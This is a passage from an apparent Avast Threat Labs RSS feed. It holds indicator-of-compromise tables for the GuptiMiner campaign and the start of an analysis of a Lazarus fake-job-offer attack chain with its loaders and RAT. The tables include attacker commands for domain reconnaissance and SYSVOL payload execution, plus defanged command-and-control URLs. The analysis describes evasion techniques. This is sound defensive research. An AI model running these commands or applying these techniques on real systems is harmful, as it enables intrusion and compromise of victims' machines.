<p>Interestingly, the final payload distributed by GuptiMiner was also XMRig which is a bit unexpected for such a thought-through operation. </p>
<p>We have also found possible ties to Kimsuky, a notorious North Korean APT group, while observing similarities between Kimsuky keylogger and fragments discovered during the analysis of the GuptiMiner operation. </p>
<h2 class="wp-block-heading">eScan follow-up</h2>
<p>We have shared our findings and our research with eScan prior to publishing this analysis. For the sake of completeness, we are including their statement on this topic:</p>
<p><em>“I would also like to highlight some key points:</em><br><em>1. Our records indicate that the last similar report was received towards the end of the year 2019.</em><br><em>2. Since 2020, we have implemented a stringent checking mechanism that utilizes EV Signing to ensure that non-signed binaries are rejected.</em><br><em>3. Multiple heuristic rules have been integrated into our solution to detect and block any instances of legitimate processes being used for mining, including the forking of unsigned binaries.</em><br><em>4. While our internal investigations did not uncover instances of the XRig miner, it is possible that this may be due to geo-location factors.</em><br><em>5. Our latest solution versions employ secure (https) downloads, ensuring encrypted communication when clients interact with our cloud-facing servers for update downloads.”</em></p>
<p>According to our telemetry, we continue to observe new infections and GuptiMiner builds within our userbase. This may be attributable to eScan clients on these devices not being updated properly.</p>
<h2 class="wp-block-heading" id="ioc">Indicators of Compromise (IoCs)</h2>
<p>In this section, we would like to summarize the Indicators of Compromise mentioned in this analysis. As they are indicators, it doesn’t automatically mean the mentioned files and/or domains are malicious on their own. </p>
<p>For more detailed list of IoCs of the whole GuptiMiner campaign, please visit our <a href="https://github.com/avast/ioc/tree/master/GuptiMiner" target="_blank" rel="noreferrer noopener">GitHub</a>.</p>
<h3 class="wp-block-heading">Evolution and Timelines </h3>
<h4 class="wp-block-heading">Domains </h4>
<figure class="wp-block-table"><table><tbody><tr><td><strong>Domain</strong></td></tr><tr><td>_spf.microsoft[.]com</td></tr><tr><td>acmeautoleasing[.]net</td></tr><tr><td>b.guterman[.]net</td></tr><tr><td>breedbackfp[.]com</td></tr><tr><td>crl.microsoft[.]com</td></tr><tr><td>crl.peepzo[.]com</td></tr><tr><td>crl.sneakerhost[.]com</td></tr><tr><td>desmoinesreg[.]com</td></tr><tr><td>dl.sneakerhost[.]com</td></tr><tr><td>edgesync[.]net</td></tr><tr><td>espcomp[.]net</td></tr><tr><td>ext.microsoft[.]com</td></tr><tr><td>ext.peepzo[.]com</td></tr><tr><td>ext.sneakerhost[.]com</td></tr><tr><td>gesucht[.]net</td></tr><tr><td>gesucht[.]net</td></tr><tr><td>globalsign.microsoft[.]com</td></tr><tr><td>icamper[.]net</td></tr><tr><td>m.airequipment[.]net</td></tr><tr><td>m.cbacontrols[.]com</td></tr><tr><td>m.gosoengine[.]com</td></tr><tr><td>m.guterman[.]net</td></tr><tr><td>m.indpendant[.]com</td></tr><tr><td>m.insomniaccinema[.]com</td></tr><tr><td>m.korkyt[.]net</td></tr><tr><td>m.satchmos[.]net</td></tr><tr><td>m.sifraco[.]com</td></tr><tr><td>ns.bretzger[.]net</td></tr><tr><td>ns.deannacraite[.]com</td></tr><tr><td>ns.desmoinesreg[.]com</td></tr><tr><td>ns.dreamsoles[.]com</td></tr><tr><td>ns.editaccess[.]com</td></tr><tr><td>ns.encontacto[.]net</td></tr><tr><td>ns.gravelmart[.]net</td></tr><tr><td>ns.gridsense[.]net</td></tr><tr><td>ns.jetmediauk[.]com</td></tr><tr><td>ns.kbdn[.]net</td></tr><tr><td>ns.lesagencestv[.]net</td></tr><tr><td>ns.penawarkanser[.]net</td></tr><tr><td>ns.srnmicro[.]net</td></tr><tr><td>ns.suechiLton[.]com</td></tr><tr><td>ns.trafomo[.]com</td></tr><tr><td>ns.trafomo[.]com</td></tr><tr><td>ns1.earthscienceclass[.]com</td></tr><tr><td>ns1.peepzo[.]com</td></tr><tr><td>ns1.securtelecom[.]com</td></tr><tr><td>ns1.sneakerhost[.]com</td></tr><tr><td>p.bramco[.]net</td></tr><tr><td>p.hashvault[.]pro</td></tr><tr><td>r.sifraco[.]com</td></tr><tr><td>spf.microsoft[.]com</td></tr><tr><td>widgeonhill[.]com</td></tr><tr><td>www.bascap[.]net</td></tr></tbody></table></figure>
<h4 class="wp-block-heading">Mutexes </h4>
<figure class="wp-block-table"><table><tbody><tr><td><strong>Mutex</strong> </td></tr><tr><td>ESOCESS_ </td></tr><tr><td>Global\Fri Aug 13 02:17:49 2021 </td></tr><tr><td>Global\Fri Aug 13 02:22:55 2021 </td></tr><tr><td>Global\Mon Apr 19 06:03:17 2021 </td></tr><tr><td>Global\Mon Apr 24 07:19:54 2023 </td></tr><tr><td>Global\Mon Feb 27 08:11:25 2023 </td></tr><tr><td>Global\Mon Jun 14 03:22:57 2021 </td></tr><tr><td>Global\Mon Mar 13 07:29:11 2023 </td></tr><tr><td>Global\Mon Mar 22 09:16:00 2021 </td></tr><tr><td>Global\Sun Jun 13 08:22:07 2021 </td></tr><tr><td>Global\Thu Aug 10 03:25:11 2023 </td></tr><tr><td>Global\Thu Aug 12 02:07:58 2021 </td></tr><tr><td>Global\Thu Feb 23 08:37:09 2023 </td></tr><tr><td>Global\Thu Mar 25 02:03:14 2021 </td></tr><tr><td>Global\Thu Mar 25 09:31:19 2021 </td></tr><tr><td>Global\Thu Nov  2 08:21:56 2023 </td></tr><tr><td>Global\Thu Nov  9 06:19:40 2023 </td></tr><tr><td>Global\Tue Apr 25 08:32:05 2023 </td></tr><tr><td>Global\Tue Mar 23 02:37:32 2021 </td></tr><tr><td>Global\Tue Oct 10 08:07:11 2023 </td></tr><tr><td>Global\Wed Aug 11 09:16:37 2021 </td></tr><tr><td>Global\Wed Jan  5 09:15:56 2022 </td></tr><tr><td>Global\Wed Jun  2 09:43:03 2021 </td></tr><tr><td>Global\Wed Mar  1 01:29:48 2023 </td></tr><tr><td>Global\Wed Mar 23 08:56:01 2022 </td></tr><tr><td>Global\Wed Mar 23 09:06:36 2022 </td></tr><tr><td>Global\Wed May 10 06:38:46 2023 </td></tr><tr><td>Global1 </td></tr><tr><td>GlobalMIVOD_V4 </td></tr><tr><td>GMCM1 </td></tr><tr><td>MIVOD_6 </td></tr><tr><td>MTX_EX01 </td></tr><tr><td>Mutex_ONLY_ME_V1 </td></tr><tr><td>Mutex_ONLY_ME_V2 </td></tr><tr><td>Mutex_ONLY_ME_V3 </td></tr><tr><td>PROCESS_ </td></tr><tr><td>SLDV014 </td></tr><tr><td>SLDV02 </td></tr><tr><td>SLDV024 </td></tr><tr><td>SLDV04 </td></tr><tr><td>SLDV10 </td></tr><tr><td>SLDV11 </td></tr><tr><td>SLDV13 </td></tr><tr><td>SLDV15 </td></tr><tr><td>SLDV17 </td></tr><tr><td>SLDV22 </td></tr><tr><td>SLDV26 </td></tr></tbody></table></figure>
<h4 class="wp-block-heading">PDB paths </h4>
<figure class="wp-block-table"><table><tbody><tr><td><strong>PDB path</strong></td></tr><tr><td>E:\projects\projects\RunCompressedSC\x64\Release\RunCompressedSC.pdb</td></tr><tr><td>E:\Projects\putty-src\windows\VS2012\x64\Release\plink.pdb</td></tr><tr><td>F:\CODE-20221019\Projects\RunCompressedSC\x64\Release\RunCompressedSC.pdb</td></tr><tr><td>F:\Pro\MainWork\Release\MainWork.pdb</td></tr><tr><td>F:\Pro\MainWork\x64\Release\MainWork.pdb</td></tr><tr><td>F:\Projects\2020-NEW\20200307-NEW\MainWork-VS2017-IPHLPAPI\Release\MainWork.pdb</td></tr><tr><td>F:\Projects\2020-NEW\20200307-NEW\MainWork-VS2017-IPHLPAPI\x64\Release\MainWork.pdb</td></tr><tr><td>F:\Projects\2020-NEW\20200307-NEW\MainWork-VS2017-nvhelper\Release\MainWork.pdb</td></tr><tr><td>F:\Projects\2020-NEW\20200307-NEW\MainWork-VS2017-nvhelper\x64\Release\MainWork.pdb</td></tr><tr><td>F:\Projects\RunCompressedSC\x64\Release\RunCompressedSC.pdb</td></tr><tr><td>F:\V202102\MainWork-VS2017 – Monitor\Release\MainWork.pdb</td></tr><tr><td>F:\V202102\MainWork-VS2017 – Monitor\x64\Release\MainWork.pdb</td></tr><tr><td>H:\projects\MainWork\Release\MainWork.pdb</td></tr></tbody></table></figure>
<h3 class="wp-block-heading">Stage 0 – Installation Process </h3>
<figure class="wp-block-table"><table><tbody><tr><td><strong>IoC</strong> </td><td><strong>Note</strong> </td></tr><tr><td>http://update3[.]mwti[.]net/pub/update/updll3.dlz </td><td> </td></tr><tr><td>c3122448ae3b21ac2431d8fd523451ff25de7f6e399ff013d6fa6953a7998fa3 </td><td>C:\Program Files\eScan\VERSION.DLL </td></tr><tr><td>7a1554fe1c504786402d97edecc10c3aa12bd6b7b7b101cfc7a009ae88dd99c6 </td><td>updll65.dlz </td></tr></tbody></table></figure>
<h3 class="wp-block-heading">Stage 0.9 – Installation Improvements </h3>
<h3 class="wp-block-heading">Stage 1 – PNG Loader </h3>
<figure class="wp-block-table"><table><tbody><tr><td><strong>IoC</strong> </td><td><strong>Note</strong> </td></tr><tr><td>ff884d4c01fccf08a916f1e7168080a2d740a62a774f18e64f377d23923b0297 </td><td> </td></tr><tr><td>ext.peepzo[.]com </td><td> </td></tr><tr><td>crl.peepzo[.]com </td><td> </td></tr><tr><td>ns1.peepzo[.]com </td><td> </td></tr><tr><td>http://www.deanmiller[.]net/m/ </td><td> </td></tr><tr><td>294b73d38b89ce66cfdefa04b1678edf1b74a9b7f50343d9036a5d549ade509a </td><td> </td></tr><tr><td>185.45.192[.]43/elimp/ </td><td> </td></tr><tr><td>6305d66aac77098107e3aa6d85af1c2e3fc2bb1f639e4a9da619c8409104c414</td><td></td></tr><tr><td>SYSTEM\CurrentControlSet\Control\Arbiters\Class </td><td>Registry </td></tr><tr><td>SYSTEM\CurrentControlSet\Control\CMF\Class </td><td>Registry </td></tr><tr><td>SYSTEM\CurrentControlSet\Control\CMF\CORE </td><td>Registry </td></tr><tr><td>SYSTEM\CurrentControlSet\Control\CMF\DEF </td><td>Registry </td></tr><tr><td>SYSTEM\CurrentControlSet\Control\CMF\Els </td><td>Registry </td></tr><tr><td>SYSTEM\CurrentControlSet\Control\CMF\ASN </td><td>Registry </td></tr><tr><td>SYSTEM\CurrentControlSet\Control\MSDTC\BSR </td><td>Registry </td></tr></tbody></table></figure>
<h3 class="wp-block-heading">Stage 2 – Gzip Loader </h3>
<figure class="wp-block-table"><table><tbody><tr><td><strong>IoC</strong> </td><td><strong>Note</strong> </td></tr><tr><td>357009a70daacfc3379560286a134b89e1874ab930d84edb2d3ba418f7ad6a0b </td><td> </td></tr></tbody></table></figure>
<h3 class="wp-block-heading">Stage 3 – Puppeteer </h3>
<figure class="wp-block-table"><table><tbody><tr><td><strong>Ioc</strong> </td><td><strong>Note</strong> </td></tr><tr><td>364984e8d62eb42fd880755a296bd4a93cc071b9705c1f1b43e4c19dd84adc65 </td><td> </td></tr><tr><td>C:\ProgramData\Microsoft\Crypto\Escan\dss.exe </td><td> </td></tr><tr><td>C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll3  </td><td> </td></tr><tr><td>C:\Windows\system32\tasks\Microsoft\windows\autochk\ESUpgrade </td><td>Scheduled task </td></tr><tr><td>HKEY_LOCAL_MACHINE\SOFTWARE\AVC3 </td><td>Registry </td></tr><tr><td>\Device\HarddiskVolume1\Program Files (x86)\eScan\download.exe </td><td> </td></tr><tr><td>4dfd082eee771b7801b2ddcea9680457f76d4888c64bb0b45d4ea616f0a47f21 </td><td> </td></tr><tr><td>SOFTWARE\Microsoft\Windows NT\CurrentVersion\DNS Server </td><td>Registry </td></tr><tr><td>net group ”domain computers” /domain </td><td>Command </td></tr><tr><td>https://m.airequipment[.]net/gpse/ </td><td> </td></tr><tr><td>487624b44b43dacb45fd93d03e25c9f6d919eaa6f01e365bb71897a385919ddd </td><td> </td></tr><tr><td>C:\Program Files (x86)\eScan\updll3.dll3 </td><td> </td></tr><tr><td>C:\Program Files\Common Files\SYSTEM\SysResetErr\SysResetErr.DLL </td><td> </td></tr><tr><td>C:\Program Files\Microsoft SQL Server\SpellChecking\MsSpellChecking.DLL </td><td> </td></tr><tr><td>C:\Program Files\Microsoft SQL Server\SpellChecking\MsSpellCheckingHost.DLL </td><td> </td></tr><tr><td>C:\ProgramData\AMD\CNext\atiadlxx.dll </td><td> </td></tr><tr><td>C:\ProgramData\Microsoft\Assistance\LunarG\vulkan-1.dll </td><td> </td></tr><tr><td>C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll </td><td> </td></tr><tr><td>C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll3 </td><td> </td></tr><tr><td>C:\ProgramData\Microsoft\Network\Escan\AutoWake.dll </td><td> </td></tr><tr><td>1c31d06cbdf961867ec788288b74bee0db7f07a75ae06d45d30355c0bc7b09fe </td><td> </td></tr><tr><td>1fbc562b08637a111464ba182cd22b1286a185f7cfba143505b99b07313c97a4 </td><td> </td></tr></tbody></table></figure>
<h3 class="wp-block-heading">Stage 4 – Backdoor </h3>
<figure class="wp-block-table"><table><tbody><tr><td><strong>IoC</strong> </td><td><strong>Note</strong> </td></tr><tr><td>07beca60c0a50520b8dbc0b8cc2d56614dd48fef0466f846a0a03afbfc42349d </td><td> </td></tr><tr><td>E:\Projects\putty-src\windows\VS2012\x64\Release\plink.pdb </td><td>PDB </td></tr><tr><td>HKEY_LOCAL_MACHINE \SYSTEM\CurrentControlSet\Control\CMF\Class </td><td>Registry </td></tr><tr><td>HKEY_LOCAL_MACHINE\SYSTEM\RNG\FFFF  </td><td>Registry </td></tr><tr><td>gesucht[.]net </td><td> </td></tr><tr><td>f0ccfcb5d49d08e9e66b67bb3fedc476fdf5476a432306e78ddaaba4f8e3bbc4 </td><td> </td></tr><tr><td>HKEY_LOCAL_MACHINE\SYSTEM\Software\Microsoft\DECLAG </td><td>Registry </td></tr><tr><td>8446d4fc1310b31238f9a610cd25ea832925a25e758b9a41eea66f998163bb34 </td><td>Shellcode </td></tr><tr><td>74D7F1AF69FB706E87FF0116B8E4FA3A9B87275505E2EE7A32A8628A2D066549 </td><td> </td></tr><tr><td>www.righttrak[.]net:443  </td><td> </td></tr><tr><td>185.248.160[.]141 </td><td> </td></tr><tr><td>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCB </td><td>Registry </td></tr><tr><td>af9f1331ac671d241bf62240aa52389059b4071a0635cb9cb58fa78ab942a33b </td><td> </td></tr></tbody></table></figure>
<h3 class="wp-block-heading">Related and Future Research </h3>
<figure class="wp-block-table"><table><tbody><tr><td><strong>IoC</strong> </td><td><strong>Note</strong> </td></tr><tr><td>“cmd.exe” /c type “\<domain>\SYSVOL\<domain>\scripts\gpon.inc” | “\<domain>\SYSVOL\<domain>\scripts\powAMD64.dat” -nop – </td><td>Command </td></tr><tr><td>C:\Windows\System32\Tasks\ScheduledDefrag </td><td>Scheduled task </td></tr><tr><td>529763AC53562BE3C1BB2C42BCAB51E3AD8F8A56 </td><td>Certificate SHA1 </td></tr><tr><td>31070C2EA30E6B4E1C270DF94BE1036AE7F8616B </td><td>Certificate SHA1 </td></tr><tr><td>31dfba1b102bbf4092b25e63aae0f27386c480c10191c96c04295cb284f20878 </td><td> </td></tr><tr><td>8e96d15864ec0cc6d3976d87e9e76e6eeccc23c551b22dcfacb60232773ec049 </td><td> </td></tr><tr><td>b0f94d84888dffacbc10bd7f9983b2d681b55d7e932c2d952d47ee606058df54 </td><td> </td></tr><tr><td>f656a418fca7c4275f2441840faaeb70947e4f39d3826d6d2e50a3e7b8120e4e </td><td> </td></tr><tr><td>7f1221c613b9de2da62da613b8b7c9afde2ea026fe6b88198a65c9485ded7b3d </td><td> </td></tr><tr><td>F:\!PROTECT\Real\startW-2008\MainWork\Release\MainWork.pdb </td><td>PDB </td></tr></tbody></table></figure>
<p>The post <a href="https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/">GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></content:encoded>
</item>
<item>
<title>From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams</title>
<link>https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/?utm_source=rss&utm_medium=rss&utm_campaign=from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams</link>
<dc:creator><![CDATA[Luigino Camastra]]></dc:creator>
<pubDate>Thu, 18 Apr 2024 06:30:00 +0000</pubDate>
<category><![CDATA[PC]]></category>
<category><![CDATA[Uncategorized]]></category>
<category><![CDATA[APT]]></category>
<category><![CDATA[Lazarus]]></category>
<category><![CDATA[Recruiting scams]]></category>
<guid isPermaLink="false">https://decoded.avast.io/?p=8332</guid>
<description><![CDATA[<p>Key Points Introduction In the summer of 2023, Avast identified a campaign targeting specific individuals in the Asian region through fabricated job offers. The motivation behind the attack remains uncertain, but judging from the low frequency of attacks, it appears that the attacker had a special interest in individuals with technical backgrounds. This sophistication is […]</p>
<p>The post <a href="https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/">From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></description>
<content:encoded><![CDATA[
<h2 class="wp-block-heading">Key Points</h2>
<ul>
<li>Avast discovered a new campaign targeting specific individuals through fabricated job offers. </li>
<li>Avast uncovered a full attack chain from infection vector to deploying <code>“FudModule 2.0”</code> rootkit with 0-day <code>Admin -> Kernel</code> exploit. </li>
<li>Avast found a previously undocumented <code>Kaolin</code> RAT, where it could aside from standard RAT functionality, change the last write timestamp of a selected file and load any received DLL binary from C&C server. We also believe it was loading FudModule along with a 0-day exploit. </li>
</ul>
<h2 class="wp-block-heading">Introduction</h2>
<p>In the summer of 2023, Avast identified a campaign targeting specific individuals in the Asian region through fabricated job offers. The motivation behind the attack remains uncertain, but judging from the low frequency of attacks, it appears that the attacker had a special interest in individuals with technical backgrounds. This sophistication is evident from previous research where the Lazarus group exploited vulnerable drivers and performed several rootkit techniques to effectively blind security products and achieve better persistence. </p>
<p>In this instance, Lazarus sought to blind security products by exploiting a vulnerability in the default Windows driver, appid.sys (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338" target="_blank" rel="noreferrer noopener">CVE-2024-21338</a>). More information about this vulnerability can be found in a corresponding <a href="https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/" target="_blank" rel="noreferrer noopener">blog post</a>. </p>
<p>This indicates that Lazarus likely allocated additional resources to develop such attacks. Prior to exploitation, Lazarus deployed the toolset meticulously, employing fileless malware and encrypting the arsenal onto the hard drive, as detailed later in this blog post. </p>
<p>Furthermore, the nature of the attack suggests that the victim was carefully selected and highly targeted, as there likely needed to be some level of rapport established with the victim before executing the initial binary. Deploying such a sophisticated toolset alongside the exploit indicates considerable resourcefulness. </p>
<p>This blog post will present a technical analysis of each module within the entire attack chain. This analysis aims to establish connections between the toolset arsenal used by the Lazarus group and previously published research. </p>
<h2 class="wp-block-heading">Initial access </h2>
<p>The attacker initiates the attack by presenting a fabricated job offer to an unsuspecting individual, utilizing social engineering techniques to establish contact and build rapport. While the specific communication platform remains unknown, previous research by  <a href="https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing" target="_blank" rel="noreferrer noopener">Mandiant</a> and <a href="https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/" target="_blank" rel="noreferrer noopener">ESET</a> suggests potential delivery vectors may include LinkedIn, WhatsApp, email or other platforms. Subsequently, the attacker attempts to send a malicious ISO file, disguised as VNC tool, which is a part of the <a href="https://securelist.com/apt-trends-report-q3-2023/110752/" target="_blank" rel="noreferrer noopener">interviewing process</a>. The choice of an ISO file is starting to be very attractive for attackers because, from Windows 10, an ISO file could be automatically mounted just by double clicking and the operating system will make the ISO content easily accessible. This may also serve as a potential Mark-of-the-Web (MotW) bypass. </p>
<p>Since the attacker created rapport with the victim, the victim is tricked by the attacker to mount the ISO file, which contains three files: <code>AmazonVNC.exe</code>, <code>version.dl</code>l and <code>aws.cfg</code>. This leads the victim to execute <code>AmazonVNC.exe</code>.  </p>
<p>The <code>AmazonVNC.exe</code> executable only pretends to be the Amazon VNC client, instead, it is a legitimate Windows application called <code>choice.exe</code> that ordinarily resides in the <code>System32</code> folder. This executable is used for sideloading, to load the malicious <code>version.dll</code> through the legitimate <code>choice.exe</code> application. Sideloading is a popular technique among attackers for evading detection since the malicious DLL is executed in the context of a legitimate application.  </p>
<p>When <code>AmazonVNC.exe</code> gets executed, it loads <code>version.dll</code>. This malicious DLL is using native Windows API functions in an attempt to avoid defensive techniques such as user-mode API hooks. All native API functions are invoked by direct syscalls. The malicious functionality is implemented in one of the exported functions and not in DLL Main. There is no code in <code>DLLMain</code> it just returns 1, and in the other exported functions is just Sleep functionality. </p>
<p>After the DLL obtains the correct syscall numbers for the current Windows version, it is ready to spawn an <code>iexpress.exe</code> process to host a further malicious payload that resides in the third file, <code>aws.cfg</code>. Injection is performed only if the Kaspersky antivirus is installed on the victim’s computer, which seems to be done to evade Kaspersky detection. If Kaspersky is not installed, the malware executes the payload by creating a thread in the current process, with no injection. The <code>aws.cfg</code> file, which is the next stage payload, is obfuscated by VMProtect, perhaps in an effort to make reverse engineering more difficult. The payload is capable of downloading shellcode from a Command and Control (C&C) server, which we believe is a legitimate hacked website selling marble material for construction. The official website is <code>https://www[.]henraux.com/</code>, and the attacker was able to download shellcode from <code>https://www[.]henraux.com/sitemaps/about/about.asp </code></p>
<p>In detailing our findings, we faced challenges extracting a shellcode from the C&C server as the malicious URL was unresponsive.  </p>
<p>By analyzing our telemetry, we uncovered potential threats in one of our clients, indicating a significant correlation between the loading of shellcode from the C&C server via an ISO file and the subsequent appearance of the <code>RollFling</code>, which is a new undocumented loader that we discovered and will delve into later in this blog post. </p>
<p>Moreover, the delivery method of the ISO file exhibits tactical similarities to those employed by the Lazarus group, a fact previously noted by researchers from <a href="https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing" target="_blank" rel="noreferrer noopener">Mandiant</a> and <a href="https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/" target="_blank" rel="noreferrer noopener">ESET</a>. </p>
<p>In addition, a <code>RollSling </code>sample was identified on the victim machines, displaying code similarities with the <code>RollSling </code>sample discussed in <a href="https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/" target="_blank" rel="noreferrer noopener">Microsoft’s research</a>. Notably, the <code>RollSling </code>instance discovered in our client’s environment was delivered by the <code>RollFling </code>loader, confirming our belief in the connection between the absent shellcode and the initial loader <code>RollFling</code>. For visual confirmation, refer to the first screenshot showcasing the SHA of <code>RollSling</code> report code from <a href="https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/" target="_blank" rel="noreferrer noopener">Microsoft</a>, while on the second screenshot is the code derived from our <code>RollSling </code>sample. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="481" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/RollSling_IDA_Microsoft-4-1024x481.png" alt="" class="wp-image-8347" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/RollSling_IDA_Microsoft-4-1024x481.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/RollSling_IDA_Microsoft-4-300x141.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/RollSling_IDA_Microsoft-4-768x361.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/RollSling_IDA_Microsoft-4-1536x721.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/RollSling_IDA_Microsoft-4.png 1725w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Image illustrates the <code>RollSling </code>code identified by Microsoft. SHA: <br><code>d9add2bfdfebfa235575687de356f0cefb3e4c55964c4cb8bfdcdc58294eeaca</code>.</figcaption></figure></div>
<div class="wp-block-group is-layout-constrained wp-block-group-is-layout-constrained"><div class="wp-block-group__inner-container"><div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="477" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-2-1024x477.png" alt="" class="wp-image-8346" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-2-1024x477.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-2-300x140.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-2-768x358.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-2-1536x715.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/IDA_Avast_rollSling-2.png 1733w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Image showcases the <code>RollSling </code>code discovered within our targe. SHA: <code>68ff1087c45a1711c3037dad427733ccb1211634d070b03cb3a3c7e836d210f</code>.</figcaption></figure></div>
<p>In the next paragraphs, we are going to explain every component in the execution chain, starting with the initial <code>RollFling</code> loader, continuing with the subsequently loaded <code>RollSling</code> loader, and then the final <code>RollMid</code> loader. Finally, we will analyze the <code>Kaolin</code> RAT, which is ultimately loaded by the chain of these three loaders. </p>
</div></div>
<h2 class="wp-block-heading">Loaders</h2>
<h3 class="wp-block-heading">RollFling</h3>
<p>The <code>RollFling</code> loader is a malicious DLL that is established as a service, indicating the attacker’s initial attempt at achieving persistence by registering as a service. Accompanying this <code>RollFling</code> loader are essential files crucial for the consistent execution of the attack chain. Its primary role is to kickstart the execution chain, where all subsequent stages operate exclusively in memory. Unfortunately, we were unable to ascertain whether the DLL file was installed as a service with administrator rights or just with standard user rights. </p>
<p>The loader acquires the System Management BIOS (SMBIOS) table by utilizing the Windows API function <code>GetSystemFirmwareTable</code>. Beginning with Windows 10, version 1803, any user mode application can access SMBIOS information. SMBIOS serves as the primary standard for delivering management information through system firmware. </p>
<p>By calling the <code>GetSystemFirmwareTable</code> (see Figure 1.) function, <code>SMBIOSTableData</code> is retrieved, and that <code>SMBIOSTableData</code> is used as a key for decrypting the encrypted <code>RollSling</code> loader by using the XOR operation. Without the correct <code>SMBIOSTableData</code>, which is a 32-byte-long key, the <code>RollSling</code> decryption process would be ineffective so the execution of the malware would not proceed to the next stage. This suggests a highly targeted attack aimed at a specific individual. </p>
<p>This suggests that prior to the attacker establishing persistence by registering the <code>RollFling</code> loader as a service, they had to gather information about the <code>SMBIOS</code> table and transmit it to the C&C server. Subsequently, the C&C server could then reply with another stage. This additional stage, called  <code>RollSling</code>, is stored in the same folder as <code>RollFling</code> but with the <code>".nls"</code> extension.  </p>
<p>After successful <code>XOR</code> decryption of <code>RollSling</code>,  <code>RollFling</code> is now ready to load decrypted <code>RollSling</code> into memory and continue with the execution of <code>RollSling</code>. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="524" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/SMBIOS_firmware_table-1024x524.png" alt="" class="wp-image-8350" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/SMBIOS_firmware_table-1024x524.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/SMBIOS_firmware_table-300x153.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/SMBIOS_firmware_table-768x393.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/SMBIOS_firmware_table.png 1469w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 1: Obtaining SMBIOS firmware table provider</figcaption></figure></div>
<h3 class="wp-block-heading">RollSling</h3>
<p>The <code>RollSling</code> loader, initiated by <code>RollFling</code>, is executed in memory. This choice may help the attacker evade detection by security software. The primary function of <code>RollSling</code> is to locate a binary blob situated in the same folder as <code>RollSling</code> (or in the Package Cache folder). If the binary blob is not situated in the same folder as the <code>RollSling</code>, then the loader will look in the Package Cache folder. This binary blob holds various stages and configuration data essential for the malicious functionality. This binary blob must have been uploaded to the victim machine by some previous stage in the infection chain.  </p>
<p>The reasoning behind binary blob holding multiple files and configuration values is twofold. Firstly, it is more efficient to hold all the information in a single file and, secondly, most of the binary blob can be encrypted, which may add another layer of evasion meaning lowering the chance of detection.  </p>
<p><code>Rollsling</code> is scanning the current folder, where it is looking for a specific binary blob. To determine which binary blob in the current folder is the right one, it first reads 4 bytes to determine the size of the data to read. Once the data is read, the bytes from the binary blob are reversed and saved in a temporary variable, afterwards, it goes through several conditions checks like the MZ header check. If the MZ header check is done, subsequently it looks for the <code>“StartAction”</code> export function from the extracted binary. If all conditions are met, then it will load the next stage <code>RollMid</code> in memory. The attackers in this case didn’t use any specific file name for a binary blob or any specific extension, to be able to easily find the binary blob in the folder. Instead, they have determined the right binary blob through several conditions, that binary blob had to meet. This is also one of the defensive evasion techniques for attackers to make it harder for defenders to find the binary blob in the infected machine. </p>
<p>This stage represents the next stage in the execution chain, which is the third loader called <code>RollMid</code> which is also executed in the computer’s memory. </p>
<p>Before the execution of the <code>RollMid</code> loader, the malware creates two folders, named in the following way: </p>
<ul>
<li>%driveLetter%:\\ProgramData\\Package Cache\\[0-9A-Z]{8}-DF09-AA86-YI78-[0-9A-Z]{12}\\ </li>
